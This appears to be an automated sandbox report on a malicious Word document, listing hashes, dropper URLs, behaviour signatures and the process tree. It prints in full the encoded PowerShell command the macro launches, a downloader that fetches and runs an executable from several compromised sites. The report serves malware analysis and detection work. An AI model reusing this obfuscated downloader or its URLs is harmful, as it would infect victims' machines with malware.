Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    14-06-2024 22:22

General

  • Target

    abbc6b68bd44d71ab99aa0ae8c028ef5_JaffaCakes118.doc

  • Size

    159KB

  • MD5

    abbc6b68bd44d71ab99aa0ae8c028ef5

  • SHA1

    7993336c1ab25eacaa1b689f0fc8233281ec9077

  • SHA256

    53a69d30f1a076c6330a4738e22990f94090def9eb771e314d79c3c1a9234ca2

  • SHA512

    82a90be29c9d5900ec5baef31bf4ba1ddd25c98520842db674ef547e06e8f587ef76fe5d76c9a6db1662a9a047e134d9fed8dd0afaa1e308af7be793f80b56bf

  • SSDEEP

    1536:ERWfcRWfsrdi1Ir77zOH98Wj2gpngd+a9H6Fgx+re7:ErfrzOH98ipgf6FO+a7

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://citas.nubeweb24.com/wp-admin/bd0/

exe.dropper

http://wallenkelley.xyz/wp-content/A1/

exe.dropper

http://noraiport.nubeweb24.com/wp-admin/eh5/

exe.dropper

https://citybasket.in/sitemap/quZ/

exe.dropper

http://tingme.vn/wp-content/plugins/X/

exe.dropper

https://fairplay.company/wp-includes/H/

exe.dropper

https://casa.nubeweb24.com/wp-admin/hiR/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\abbc6b68bd44d71ab99aa0ae8c028ef5_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABWAG0AXwBkAGEAbwByAD0AKAAoACcASwBhACcAKwAnAGIAegAnACkAKwAoACcAZwBlACcAKwAnAGUAJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAUwBlAHIAUAByAE8ARgBpAEwARQBcAG8AbQBwADcAZQBpAGEAXABQADUANABDAEcAVwA0AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQBSAEUAYwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAHUAUgBpAGAAVAB5AGAAcAByAGAAbwBUAG8AYwBPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIAJwApACsAKAAnACwAJwArACcAIAB0ACcAKQArACgAJwBsAHMAMQAnACsAJwAxACcAKQArACgAJwAsACcAKwAnACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAEMAaQB4AHgAOAAyADcAIAA9ACAAKAAoACcAWQAnACsAJwBmAGkAZwB3ACcAKQArACcAXwAnACkAOwAkAFYAdgB4AF8AagBsAGcAPQAoACgAJwBNACcAKwAnAHEAJwArACcAZAA0AHYAMwAnACkAKwAnADMAJwApADsAJABCAHYAOAB2AGQAZABpAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHkAJwArACgAJwBLAGwAJwArACcATwBtAHAANwBlACcAKwAnAGkAYQB5AEsAbAAnACkAKwAoACcAUAA1ACcAKwAnADQAJwApACsAJwBjAGcAJwArACcAdwAnACsAKAAnADQAJwArACcAeQBLAGwAJwApACkALQBDAHIAZQBwAGwAYQBDAGUAIAAgACgAJwB5ACcAKwAnAEsAbAAnACkALABbAGMAaABBAHIAXQA5ADIAKQArACQAQwBpAHgAeAA4ADIANwArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQARQA3ADQAcgBkAGgAbAA9ACgAJwBMADEAJwArACgAJwB5ACcAKwAnAGUAYQAnACkAKwAnAG8AdwAnACkAOwAkAE8AegBoAGMAegA5ADAAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAEIAQwBsAGkARQBOAHQAOwAkAFMAeABtAGYAOAA1ADMAPQAoACgAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8ALwBjAGkAJwArACcAdAAnACsAJwBhAHMALgBuACcAKQArACgAJwB1ACcAKwAnAGIAZQB3ACcAKQArACgAJwBlAGIAMgAnACsAJwA0ACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AdwBwACcAKQArACcALQBhACcAKwAnAGQAbQAnACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBiAGQAJwArACcAMAAnACkAKwAoACcALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAOgAvAC8AdwAnACkAKwAoACcAYQBsAGwAJwArACcAZQAnACkAKwAoACcAbgBrACcAKwAnAGUAJwApACsAJwBsAGwAJwArACgAJwBlAHkALgAnACsAJwB4ACcAKQArACgAJwB5ACcAKwAnAHoALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGMAJwArACcAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcAQQAxAC8AKgBoAHQAdABwADoALwAnACsAJwAvAG4AJwArACcAbwByAGEAJwArACcAaQAnACsAJwBwACcAKQArACcAbwByACcAKwAnAHQAJwArACgAJwAuAG4AdQBiAGUAJwArACcAdwAnACsAJwBlAGIAMgA0AC4AJwArACcAYwAnACkAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwArACcAaQAnACsAJwBuAC8AZQBoADUALwAqACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AC8ALwBjAGkAJwApACsAKAAnAHQAeQAnACsAJwBiAGEAcwBrAGUAJwApACsAKAAnAHQAJwArACcALgBpACcAKQArACcAbgAvACcAKwAoACcAcwAnACsAJwBpACcAKwAnAHQAZQBtAGEAcAAnACkAKwAoACcALwBxAHUAWgAnACsAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAvAHQAaQAnACsAJwBuAGcAbQAnACsAJwBlAC4AJwApACsAKAAnAHYAbgAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AJwApACsAKAAnAG4AdABlAG4AdAAvAHAAJwArACcAbAAnACkAKwAoACcAdQBnAGkAJwArACcAbgBzAC8AJwApACsAKAAnAFgALwAnACsAJwAqAGgAdAB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvAC8AZgAnACsAJwBhAGkAcgBwACcAKQArACgAJwBsAGEAeQAnACsAJwAuAGMAbwAnACkAKwAnAG0AJwArACgAJwBwACcAKwAnAGEAbgB5ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKQArACgAJwBpAG4AJwArACcAYwBsAHUAZABlACcAKQArACgAJwBzAC8AJwArACcASAAvACoAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwArACcALwBjAGEAJwApACsAKAAnAHMAYQAuAG4AdQBiAGUAdwBlAGIAMgAnACsAJwA0AC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKwAnAHAALQBhAGQAJwArACcAbQBpAG4ALwBoACcAKQArACcAaQBSACcAKwAnAC8AJwApAC4AIgBTAFAATABgAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFYAdgBnAHMAbwBwAGgAPQAoACcARwAnACsAKAAnADcAdQBqAGMAJwArACcAbAAnACkAKwAnAHUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVwA0ADYANAB0AGEANgAgAGkAbgAgACQAUwB4AG0AZgA4ADUAMwApAHsAdAByAHkAewAkAE8AegBoAGMAegA5ADAALgAiAGQATwB3AGAATgBMAGAATwBBAGQARgBgAGkAbABlACIAKAAkAFcANAA2ADQAdABhADYALAAgACQAQgB2ADgAdgBkAGQAaQApADsAJABFAHIAYgBsADQAcwB5AD0AKAAoACcARwB1ACcAKwAnAHQAJwApACsAKAAnAHUAeQAnACsAJwBiAGUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAQgB2ADgAdgBkAGQAaQApAC4AIgBsAEUATgBHAGAAVABoACIAIAAtAGcAZQAgADIAMQA4ADgAMgApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABCAHYAOAB2AGQAZABpACkAOwAkAEQAMABfAHYAawBrADMAPQAoACgAJwBOAGoAaAAnACsAJwB4ACcAKQArACgAJwBjAGEAJwArACcAZgAnACkAKQA7AGIAcgBlAGEAawA7ACQASABfAHQAbgBsAGYAbQA9ACgAKAAnAE4AJwArACcAagA1ADcAJwApACsAKAAnAHkAJwArACcAeABoACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAHAAOQBuAHUAMwA3AD0AKAAnAEgAJwArACgAJwB4ACcAKwAnAGsAagAnACkAKwAoACcAcQBfACcAKwAnAGcAJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2664

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c7c4acaea2f965496b3925e72177bb76

      SHA1

      8e0af4184291c80f8ac0d58d5d4a440a80df3d4f

      SHA256

      d2fc9b4a9be33510dc517039d8122f4d9ce7963e25e4a7265b07c4d3feea3e7e

      SHA512

      adb3d974ad3132eaadd0f68e7e11dbe1011fe4a98250062a333d6043ce585c17d91db690590f23323d22ac332d64720fc8c5d84cca7adec6fd59e9be87b4c308

    • memory/2040-19-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2040-6-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-27-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-8-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-11-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-9-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-10-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-16-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-17-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-14-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-13-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-12-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-18-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-22-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-21-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-20-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-0-0x000000002F661000-0x000000002F662000-memory.dmp

      Filesize

      4KB

    • memory/2040-7-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-2-0x00000000714FD000-0x0000000071508000-memory.dmp

      Filesize

      44KB

    • memory/2040-28-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-25-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-24-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-23-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-32-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-31-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-30-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-29-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-33-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-66-0x00000000714FD000-0x0000000071508000-memory.dmp

      Filesize

      44KB

    • memory/2040-26-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-45-0x00000000714FD000-0x0000000071508000-memory.dmp

      Filesize

      44KB

    • memory/2040-46-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-48-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2040-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2664-40-0x0000000001D00000-0x0000000001D08000-memory.dmp

      Filesize

      32KB

    • memory/2664-39-0x000000001B5B0000-0x000000001B892000-memory.dmp

      Filesize

      2.9MB